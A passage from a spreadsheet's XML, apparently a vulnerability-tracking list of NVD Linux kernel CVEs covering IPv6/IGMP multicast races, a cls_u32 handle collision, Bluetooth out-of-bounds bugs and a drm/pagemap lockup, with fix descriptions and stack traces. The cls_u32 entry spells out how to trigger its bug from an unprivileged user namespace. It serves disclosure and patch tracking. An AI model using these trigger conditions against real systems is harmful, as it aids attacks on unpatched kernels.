      <c r="K721" s="5" t="inlineStr"/>
      <c r="L721" s="5" t="inlineStr"/>
      <c r="M721" s="5" t="inlineStr"/>
      <c r="N721" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O721" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P721" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q721" s="5" t="inlineStr"/>
      <c r="R721" s="5" t="inlineStr"/>
      <c r="S721" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ipv6: mcast: use rcu_assign_pointer() for __rcu list updates
Several places in net/ipv6/mcast.c update RCU-protected lists
(np-&gt;ipv6_mc_list, idev-&gt;mc_list, idev-&gt;mc_tomb) using direct pointer
assignments instead of rcu_assign_pointer():
1. In __ipv6_dev_mc_dec(), unlinking a group from idev-&gt;mc_list did:
       *map = ma-&gt;next;
   without rcu_assign_pointer() while concurrent readers traverse
   idev-&gt;mc_list locklessly under rcu_read_lock().
2. In ipv6_sock_mc_drop() and __ipv6_sock_mc_close(), unlinking a group
   from np-&gt;ipv6_mc_list directly assigned *lnk = mc_lst-&gt;next and
   np-&gt;ipv6_mc_list = mc_lst-&gt;next without rcu_assign_pointer(), racing
   with lockless readers in inet6_mc_check().
3. In __ipv6_sock_mc_join(), mc_lst-&gt;next was initialized to
   np-&gt;ipv6_mc_list via raw assignment before publishing mc_lst.
4. In mld_del_delrec() and __ipv6_dev_mc_inc(), __rcu source pointers
   passed into rcu_assign_pointer() lacked explicit dereference helpers.
Fix these by consistently using rcu_assign_pointer() along with
mc_dereference() / sock_dereference().</t>
        </is>
      </c>
      <c r="T721" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98099</t>
        </is>
      </c>
    </row>
    <row r="722">
      <c r="A722" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B722" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C722" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98101</t>
        </is>
      </c>
      <c r="D722" s="5" t="inlineStr"/>
      <c r="E722" s="5" t="inlineStr"/>
      <c r="F722" s="5" t="inlineStr"/>
      <c r="G722" s="5" t="inlineStr"/>
      <c r="H722" s="5" t="inlineStr"/>
      <c r="I722" s="5" t="inlineStr"/>
      <c r="J722" s="5" t="inlineStr"/>
      <c r="K722" s="5" t="inlineStr"/>
      <c r="L722" s="5" t="inlineStr"/>
      <c r="M722" s="5" t="inlineStr"/>
      <c r="N722" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O722" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P722" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q722" s="5" t="inlineStr"/>
      <c r="R722" s="5" t="inlineStr"/>
      <c r="S722" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ipv6: mcast: use copy-on-write RCU updates in ip6_mc_source()
pmc-&gt;sflist is read locklessly under rcu_read_lock() by
inet6_mc_check() during packet reception in the UDP and RAW
multicast receive paths.
ip6_mc_source() mutated psl-&gt;sl_addr and psl-&gt;sl_count in-place
when adding or removing a source filter. Additionally, when expanding
the filter buffer, newpsl was published via rcu_assign_pointer()
before writing the new source into the array.
Because 16-byte struct in6_addr writes are not atomic and array
shifting is not synchronized with RCU readers, concurrent readers in
inet6_mc_check() could read torn IPv6 addresses or observe
duplicated/missed source entries.
Fix this by switching ip6_mc_source() to copy-on-write RCU updates:
allocate and fully populate newpsl before publishing it via
rcu_assign_pointer(), and reclaim the old filter via kfree_rcu(),
matching ip6_mc_msfilter().
Also remove the now unused IP6_SFBLOCK macro.</t>
        </is>
      </c>
      <c r="T722" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98101</t>
        </is>
      </c>
    </row>
    <row r="723">
      <c r="A723" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B723" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C723" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98102</t>
        </is>
      </c>
      <c r="D723" s="5" t="inlineStr"/>
      <c r="E723" s="5" t="inlineStr"/>
      <c r="F723" s="5" t="inlineStr"/>
      <c r="G723" s="5" t="inlineStr"/>
      <c r="H723" s="5" t="inlineStr"/>
      <c r="I723" s="5" t="inlineStr"/>
      <c r="J723" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K723" s="5" t="inlineStr"/>
      <c r="L723" s="5" t="inlineStr"/>
      <c r="M723" s="5" t="inlineStr"/>
      <c r="N723" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O723" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P723" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q723" s="5" t="inlineStr"/>
      <c r="R723" s="5" t="inlineStr"/>
      <c r="S723" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ipv6: mcast: fix RCU list diversion in ip6_mc_del1_src()
When removing a source filter whose count reaches zero, ip6_mc_del1_src()
unlinks psf from pmc-&gt;mca_sources. If the filter was previously active,
the code moved psf directly into pmc-&gt;mca_tomb by updating psf-&gt;sf_next.
Because pmc-&gt;mca_sources is traversed locklessly under RCU (e.g. by
ipv6_chk_mcast_addr()), mutating psf-&gt;sf_next before a grace period
elapses diverts concurrent readers to the tombstone list. Consequently,
readers miss remaining active sources in pmc-&gt;mca_sources and improperly
examine deleted tombstone entries.
Fix this by allocating a new tombstone node for pmc-&gt;mca_tomb (as done
in sf_setstate()) and retiring the original psf via kfree_rcu().</t>
        </is>
      </c>
      <c r="T723" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98102</t>
        </is>
      </c>
    </row>
    <row r="724">
      <c r="A724" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B724" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C724" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98103</t>
        </is>
      </c>
      <c r="D724" s="5" t="inlineStr"/>
      <c r="E724" s="5" t="inlineStr"/>
      <c r="F724" s="5" t="inlineStr"/>
      <c r="G724" s="5" t="inlineStr"/>
      <c r="H724" s="5" t="inlineStr"/>
      <c r="I724" s="5" t="inlineStr"/>
      <c r="J724" s="5" t="inlineStr"/>
      <c r="K724" s="5" t="inlineStr"/>
      <c r="L724" s="5" t="inlineStr"/>
      <c r="M724" s="5" t="inlineStr"/>
      <c r="N724" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O724" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P724" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q724" s="5" t="inlineStr"/>
      <c r="R724" s="5" t="inlineStr"/>
      <c r="S724" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
igmp: convert struct ip_sf_list to RCU
Commit 23d2b94043ca ("igmp: Add ip_mc_list lock in ip_check_mc_rcu")
added spin_lock_bh(&amp;im-&gt;lock) to ip_check_mc_rcu() to prevent a
use-after-free while iterating im-&gt;sources during concurrent deletions.
However, ip_check_mc_rcu() is called from RCU read-side critical
sections in packet receive and route lookup fast paths (e.g.
__mkroute_output(), ip_route_input_rcu(), and __udp4_lib_rcv()).
When igmpv3_send_cr() or igmpv3_send_report() holds &amp;pmc-&gt;lock and
calls add_grec() -&gt; igmpv3_newpack() -&gt; ip_route_output_ports(),
an XFRM policy matching a multicast destination triggers
xfrm_tmpl_resolve_one() -&gt; xfrm4_get_saddr() -&gt; __mkroute_output() -&gt;
ip_check_mc_rcu(). This attempts to acquire &amp;im-&gt;lock while &amp;pmc-&gt;lock
is already held on the same CPU, triggering a lockdep recursive locking
warning / deadlock.
Fix this by converting IPv4 struct ip_sf_list to RCU, mirroring the
IPv6 implementation in net/ipv6/mcast.c:
1. Add struct rcu_head to struct ip_sf_list and annotate sf_next,
   sources, and tomb as __rcu pointers.
2. Use rcu_assign_pointer() and kfree_rcu() for list updates and
   deletions.
3. Remove spin_lock_bh(&amp;im-&gt;lock) from ip_check_mc_rcu() and traverse
   im-&gt;sources locklessly with for_each_psf_rcu(), reading and writing
   counter fields with READ_ONCE() and WRITE_ONCE().
Note: RCU conversion of /proc/net/mcfilter will be done in a
separate patch.</t>
        </is>
      </c>
      <c r="T724" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98103</t>
        </is>
      </c>
    </row>
    <row r="725">
      <c r="A725" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B725" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C725" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98104</t>
        </is>
      </c>
      <c r="D725" s="5" t="inlineStr"/>
      <c r="E725" s="5" t="inlineStr"/>
      <c r="F725" s="5" t="inlineStr"/>
      <c r="G725" s="5" t="inlineStr"/>
      <c r="H725" s="5" t="inlineStr"/>
      <c r="I725" s="5" t="inlineStr"/>
      <c r="J725" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K725" s="5" t="inlineStr"/>
      <c r="L725" s="5" t="inlineStr"/>
      <c r="M725" s="5" t="inlineStr"/>
      <c r="N725" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O725" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P725" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q725" s="5" t="inlineStr"/>
      <c r="R725" s="5" t="inlineStr"/>
      <c r="S725" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/sched: cls_u32: fix duplicate handle when node ID pool is exhausted
gen_new_kid() falls back to returning max (htid | 0xFFF) when both
idr_alloc_u32() ranges are full, instead of reporting an error.
u32_change() trusts that value and inserts a new knode with a handle
that is already live in the hash table, breaking handle uniqueness
within the table's node ID space.
The handle was never reserved in ht-&gt;handle_idr, so every later error
path that does idr_remove(&amp;ht-&gt;handle_idr, handle) removes the
reservation of a different, live knode, which is then reused — one
failed add compounds into further duplicates.
The 4095 limit is per (table, bucket) — ht-&gt;handle_idr is per hash
table and the range is derived from htid (bucketid), so a table with
divisor 256 can legitimately hold 256*4095 knodes.
The sibling helper gen_new_htid() has the same silent in-band failure:
it returns 0 when the tp_c handle pool (1..0x7FF) is full, and
u32_init() publishes the root hash table with handle 0 without
checking.  Two root tables with handle 0 alias in u32_lookup_ht(),
allowing cross-tcf_proto knode add/lookup/delete.  Add the same
exhaustion check that the divisor path already has.
Return an error so u32_change() fails with ENOSPC/ENOMEM when the
node ID space is exhausted, and so u32_init() fails with -ENOMEM
when the hash table ID space is exhausted.  The extack message
distinguishes pool exhaustion (-ENOSPC) from a transient allocation
failure (-ENOMEM).
Conditions to recreate the bug:
- CONFIG_NET_SCHED=y, CONFIG_CLS_U32=y (or =m with module loaded)
- Create a clsact qdisc on a device, then add 4095 u32 filters with
  auto-generated handles to fill the node ID space for the root hash
  table (single bucket). The 4096th auto-handle filter add triggers
  the duplicate handle (fh 800::fff reused). Reachable at Level 2
  (unshare -Urn, namespace-local CAP_NET_ADMIN).
- For gen_new_htid: create 2047 u32 proto entries on the same block
  to fill the tp_c handle pool, then create one more. The root table
  gets handle 0 and aliases with other handle-0 root tables.</t>
        </is>
      </c>
      <c r="T725" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98104</t>
        </is>
      </c>
    </row>
    <row r="726">
      <c r="A726" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B726" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C726" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98105</t>
        </is>
      </c>
      <c r="D726" s="5" t="inlineStr"/>
      <c r="E726" s="5" t="inlineStr"/>
      <c r="F726" s="5" t="inlineStr"/>
      <c r="G726" s="5" t="inlineStr"/>
      <c r="H726" s="5" t="inlineStr"/>
      <c r="I726" s="5" t="inlineStr"/>
      <c r="J726" s="5" t="inlineStr"/>
      <c r="K726" s="5" t="inlineStr"/>
      <c r="L726" s="5" t="inlineStr"/>
      <c r="M726" s="5" t="inlineStr"/>
      <c r="N726" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O726" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P726" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q726" s="5" t="inlineStr"/>
      <c r="R726" s="5" t="inlineStr"/>
      <c r="S726" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: ethernet: oa_tc6: Improve the error recovery
When oversubscribed traffic causes lot of buffer overflow errors,
probably due to loss of data chunks, driver fails to find a
data chunk with end_valid bit set, before it runs out of sk buffer
space. As a result, assert is seen during skb_put.
Now, check is made if skb buffer has enough tailroom for the
incoming data before accepting. If there is no room, current
frame is abandoned and it will start looking for a data chunk
with start_valid bit, that is a new frame.
SK buffer allocation error is considered as recoverable error.
rx_buf_overflow flag is too specific and no longer the only
condition this flag is used for. Therefore it is renamed as
wait_until_start_valid. This is more appropriate as this flag
is used to look for the next data chunk with SV bit set, after
failures like buffer overflow, buffer allocation failure, skb pointer
validity besides buffer overflow error.
Not writing to status0 if it reads 0.</t>
        </is>
      </c>
      <c r="T726" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98105</t>
        </is>
      </c>
    </row>
    <row r="727">
      <c r="A727" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B727" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C727" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98106</t>
        </is>
      </c>
      <c r="D727" s="5" t="inlineStr"/>
      <c r="E727" s="5" t="inlineStr"/>
      <c r="F727" s="5" t="inlineStr"/>
      <c r="G727" s="5" t="inlineStr"/>
      <c r="H727" s="5" t="inlineStr"/>
      <c r="I727" s="5" t="inlineStr"/>
      <c r="J727" s="5" t="inlineStr"/>
      <c r="K727" s="5" t="inlineStr"/>
      <c r="L727" s="5" t="inlineStr"/>
      <c r="M727" s="5" t="inlineStr"/>
      <c r="N727" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O727" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P727" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q727" s="5" t="inlineStr"/>
      <c r="R727" s="5" t="inlineStr"/>
      <c r="S727" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/pagemap: Prevent double migration of device pages
A device-private folio migrated to system memory by a CPU fault can
remain reachable through the raw-PFN eviction path until migration
finalization drops the source reference.
If eviction selects the same device-private folio during this window,
it can attempt to migrate the folio again. The second migration can leave
an uncharged folio on an LRU list, causing folio_lruvec_lock_irqsave() to
retry indefinitely and resulting in a soft lockup and RCU stall.
Mark successfully migrated device-private folios using a low bit of
their zone_device_data before migration finalization. Make both CPU-fault
and raw-PFN migration paths skip device-private folios carrying this
flag.
Mask the flag when retrieving the drm_pagemap_zdd pointer and preserve
it when a device-private folio is split. Keeping the state on the physical
folio also avoids depending on a virtual address that may change before a
fault occurs.
v2:
- Replace the retired-PFN XArray with an embedded bitmap. (Matthew Brost)
- Mark every base page covered by a migrated folio so retirement remains
  valid if the folio is later split.
v3:
- Store the migrated state in a low bit of zone_device_data instead of
  adding virtual-range and bitmap tracking to the ZDD. (Matthew Brost)
- Mask the flag when retrieving the ZDD and preserve it when splitting
  a folio.
- Drop the pre-existing fixes already covered by Matthew Brost's series:
  https://patchwork.freedesktop.org/series/171651/
v4:
- Advance by the folio size only for migration entries marked with
  MIGRATE_PFN_COMPOUND. (Sashiko)
v5:
- Simplify ZDD flag updates and folio iteration. (Matthew Brost)
- Skip retired device-private folios in the CPU-fault path. (Matthew Brost)
- Preserve flag bits while taking a new ZDD reference for split folios.
v6:
- Restore MIGRATE_PFN_COMPOUND-aware stepping so non-compound migration
  entries are processed one at a time. (Sashiko)
- Drop the pre-existing fixes already covered by Matthew Brost's series:
  https://patchwork.freedesktop.org/series/171651/
The lockup was observed as:
[10109.860465] watchdog: BUG: soft lockup - CPU#9 stuck for 26s! [kworker/u65:5:6557]
[10109.860524] Tainted: [S]=CPU_OUT_OF_SPEC, [O]=OOT_MODULE
[10109.860524] Hardware name: ASUS System Product Name/PRIME Z790-P WIFI, BIOS 0812 02/24/2023
[10109.860525] Workqueue: xe_page_fault_work_queue xe_pagefault_queue_work [xe]
[10109.860644] RIP: 0010:_raw_spin_unlock_irqrestore+0x57/0x80
[10109.860655] Call Trace:
[10109.860655]  &lt;TASK&gt;
[10109.860657]  folio_lruvec_lock_irqsave+0x216/0x220
[10109.860661]  ? __pfx_lru_add+0x10/0x10
[10109.860665]  folio_batch_move_lru+0xc8/0x450
[10109.860670]  ? lock_acquire+0xc4/0x2d0
[10109.860674]  ? __folio_batch_add_and_move+0x60/0x2e0
[10109.860677]  ? folio_migrate_mapping+0xa6/0x110
[10109.860679]  ? folio_migrate_flags+0x13b/0x1b0
[10109.860681]  ? __pfx_lru_add+0x10/0x10
[10109.860683]  __folio_batch_add_and_move+0xe7/0x2e0
[10109.860685]  ? dma_iova_try_alloc+0xb0/0x140
[10109.860689]  folio_add_lru+0x64/0x80
[10109.860691]  __migrate_device_finalize+0x12c/0x270
[10109.860695]  migrate_device_finalize+0x10/0x20
[10109.860698]  drm_pagemap_evict_to_ram+0x185/0x370 [drm_gpusvm_helper]
[10109.860704]  ? drm_pagemap_evict_to_ram+0x96/0x370 [drm_gpusvm_helper]
[10109.860709]  xe_svm_bo_evict+0x15/0x20 [xe]
[10109.860819]  ? xe_svm_bo_evict+0x15/0x20 [xe]
[10109.860921]  xe_bo_move+0x107e/0x1570 [xe]
[10109.860992]  ? xe_ttm_tt_create+0x168/0x340 [xe]
[10109.861059]  ? __up_read+0x98/0x2b0
[10109.861061]  ? lock_is_held_type+0xa3/0x130
[10109.861067]  ttm_bo_handle_move_mem+0xe8/0x1e0 [ttm]
[10109.861075]  ttm_bo_evict+0x141/0x1c0 [ttm]
[10109.861081]  ttm_bo_evict_cb+0x9f/0x100 [ttm]
[10109.861086]  ttm_lru_walk_for_evict+0x84/0x190 [ttm]
[10109.861091]  ? xe_ttm_vram_mgr_new+0x258/0x3a0 [xe]
[10109.861198]  ttm_bo_alloc_resource+0x219/0
---truncated---</t>
        </is>
      </c>
      <c r="T727" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98106</t>
        </is>
      </c>
    </row>
    <row r="728">
      <c r="A728" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B728" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C728" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98107</t>
        </is>
      </c>
      <c r="D728" s="5" t="inlineStr"/>
      <c r="E728" s="5" t="inlineStr"/>
      <c r="F728" s="5" t="inlineStr"/>
      <c r="G728" s="5" t="inlineStr"/>
      <c r="H728" s="5" t="inlineStr"/>
      <c r="I728" s="5" t="inlineStr"/>
      <c r="J728" s="5" t="inlineStr"/>
      <c r="K728" s="5" t="inlineStr"/>
      <c r="L728" s="5" t="inlineStr"/>
      <c r="M728" s="5" t="inlineStr"/>
      <c r="N728" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O728" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P728" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q728" s="5" t="inlineStr"/>
      <c r="R728" s="5" t="inlineStr"/>
      <c r="S728" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: L2CAP: fix out-of-bounds write in l2cap_ecred_connect
l2cap_chan_connect() tries to ensure there are no more than
L2CAP_ECRED_CONN_SCID_MAX pending ECRED channels, so they fit in the
same L2CAP_ECRED_CONN_REQ that l2cap_ecred_connect() constructs.
However, the check only counts deferred channels.  If 6 L2CAP sockets
are connected at the same time in order DDDDND (D=deferred,
N=non-deferred), the last can bump the total to max+1.  It results to
one __le16 written out of bounds of the scid array, and an invalid
ECRED_CONN_REQ being sent.
Fix by leaving room for the non-deferred pending ECRED channels in the
counting in l2cap_chan_connect(), so the limit can't be exceeded.
Move counting under same critical section where the channel is added.
Although race conditions involving this appear unreachable, it's easier
to see.
Also add WARN_ON_ONCE check in l2cap_ecred_defer_connect() to make this
less brittle.</t>
        </is>
      </c>
      <c r="T728" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98107</t>
        </is>
      </c>
    </row>
    <row r="729">
      <c r="A729" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B729" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C729" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98109</t>
        </is>
      </c>
      <c r="D729" s="5" t="inlineStr"/>
      <c r="E729" s="5" t="inlineStr"/>
      <c r="F729" s="5" t="inlineStr"/>
      <c r="G729" s="5" t="inlineStr"/>
      <c r="H729" s="5" t="inlineStr"/>
      <c r="I729" s="5" t="inlineStr"/>
      <c r="J729" s="5" t="inlineStr"/>
      <c r="K729" s="5" t="inlineStr"/>
      <c r="L729" s="5" t="inlineStr"/>
      <c r="M729" s="5" t="inlineStr"/>
      <c r="N729" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O729" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P729" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q729" s="5" t="inlineStr"/>
      <c r="R729" s="5" t="inlineStr"/>
      <c r="S729" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: hci_core: Fix race condition during device registration
In hci_register_dev(), the power_on work item is queued to
hdev-&gt;req_workqueue before initializing hdev-&gt;adv_monitors_idr and
registering the MSFT extension via msft_register(). For devices marked with
quirks such as HCI_QUIRK_RAW_DEVICE, the HCI_UNCONFIGURED flag is set on
the device. When the power_on work item runs concurrently on another CPU,
hci_power_on() detects that the device is unconfigured and immediately
invokes hci_dev_do_close(), which calls msft_do_close().
Concurrently, msft_register() allocates the msft structure and exposes it
to hdev-&gt;msft_data prior to calling mutex_init(&amp;msft-&gt;filter_lock). If
msft_do_close() executes while hdev-&gt;msft_data is already assigned but the
mutex has not yet been initialized, mutex_lock(&amp;msft-&gt;filter_lock) operates
on an uninitialized mutex, triggering a DEBUG_LOCKS warning:
DEBUG_LOCKS_WARN_ON(lock-&gt;magic != lock)
WARNING: kernel/locking/mutex.c:625 at __mutex_lock_common
kernel/locking/mutex.c:625 [inline]
WARNING: kernel/locking/mutex.c:625 at __mutex_lock+0x12d8/0x1550
kernel/locking/mutex.c:821
...
Call Trace:
 &lt;TASK&gt;
 msft_do_close+0x308/0x7b0 net/bluetooth/msft.c:693
 hci_dev_close_sync+0x86b/0x10a0 net/bluetooth/hci_sync.c:5522
 hci_dev_do_close net/bluetooth/hci_core.c:499 [inline]
 hci_power_on+0x32c/0x750 net/bluetooth/hci_core.c:937
 process_one_work kernel/workqueue.c:3322 [inline]
 process_scheduled_works+0xa8e/0x14e0 kernel/workqueue.c:3405
 worker_thread+0x92d/0xe10 kernel/workqueue.c:3486
 kthread+0x388/0x470 kernel/kthread.c:436
 ret_from_fork+0x514/0xb70 arch/x86/kernel/process.c:158
 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245
 &lt;/TASK&gt;
Fix this by moving the queue_work() call in hci_register_dev() to after
idr_init(&amp;hdev-&gt;adv_monitors_idr) and msft_register(hdev) so that device
structures and extensions are fully initialized before asynchronous tasks
can access them. Additionally, assign hdev-&gt;msft_data in msft_register()
only after mutex_init(&amp;msft-&gt;filter_lock) has completed.</t>
        </is>
      </c>
      <c r="T729" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98109</t>
        </is>
      </c>
    </row>
    <row r="730">
      <c r="A730" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B730" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C730" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98110</t>
        </is>
      </c>
      <c r="D730" s="5" t="inlineStr"/>
      <c r="E730" s="5" t="inlineStr"/>
      <c r="F730" s="5" t="inlineStr"/>
      <c r="G730" s="5" t="inlineStr"/>
      <c r="H730" s="5" t="inlineStr"/>
      <c r="I730" s="5" t="inlineStr"/>
      <c r="J730" s="5" t="inlineStr"/>
      <c r="K730" s="5" t="inlineStr"/>
      <c r="L730" s="5" t="inlineStr"/>
      <c r="M730" s="5" t="inlineStr"/>
      <c r="N730" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O730" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P730" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q730" s="5" t="inlineStr"/>
      <c r="R730" s="5" t="inlineStr"/>
      <c r="S730" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: btintel: bound firmware ID by TLV length
The firmware ID is treated as a NUL-terminated string even though the
TLV length is its only boundary. If the value does not contain a NUL
terminator, snprintf() can read beyond the received response.
Limit the conversion to the advertised TLV value length.</t>
        </is>
      </c>
      <c r="T730" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98110</t>
        </is>
      </c>
    </row>
    <row r="731">
      <c r="A731" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B731" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C731" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98111</t>
        </is>
      </c>
      <c r="D731" s="5" t="inlineStr"/>
      <c r="E731" s="5" t="inlineStr"/>
      <c r="F731" s="5" t="inlineStr"/>
      <c r="G731" s="5" t="inlineStr"/>
      <c r="H731" s="5" t="inlineStr"/>
      <c r="I731" s="5" t="inlineStr"/>
      <c r="J731" s="5" t="inlineStr"/>
      <c r="K731" s="5" t="inlineStr"/>
      <c r="L731" s="5" t="inlineStr"/>
      <c r="M731" s="5" t="inlineStr"/>
      <c r="N731" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O731" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P731" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q731" s="5" t="inlineStr"/>
      <c r="R731" s="5" t="inlineStr"/>
      <c r="S731" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
Bluetooth: btintel: validate version TLV value lengths
btintel_parse_version_tlv() verifies that a complete TLV is present in
the response, but it does not ensure that the value is long enough for
the specific TLV type. A short value can therefore cause an
out-of-bounds read through get_unaligned_le16(), get_unaligned_le32(),
or memcpy().
Reject values shorter than the minimum required by each known TLV type.
Also reject responses that do not contain the Command Complete Status
field.</t>
        </is>
      </c>
      <c r="T731" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98111</t>
        </is>
      </c>
    </row>
    <row r="732">
      <c r="A732" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B732" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C732" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98113</t>
        </is>
      </c>
      <c r="D732" s="5" t="inlineStr"/>
      <c r="E732" s="5" t="inlineStr"/>
      <c r="F732" s="5" t="inlineStr"/>
      <c r="G732" s="5" t="inlineStr"/>
      <c r="H732" s="5" t="inlineStr"/>
      <c r="I732" s="5" t="inlineStr"/>
      <c r="J732" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K732" s="5" t="inlineStr"/>
      <c r="L732" s="5" t="inlineStr"/>
      <c r="M732" s="5" t="inlineStr"/>
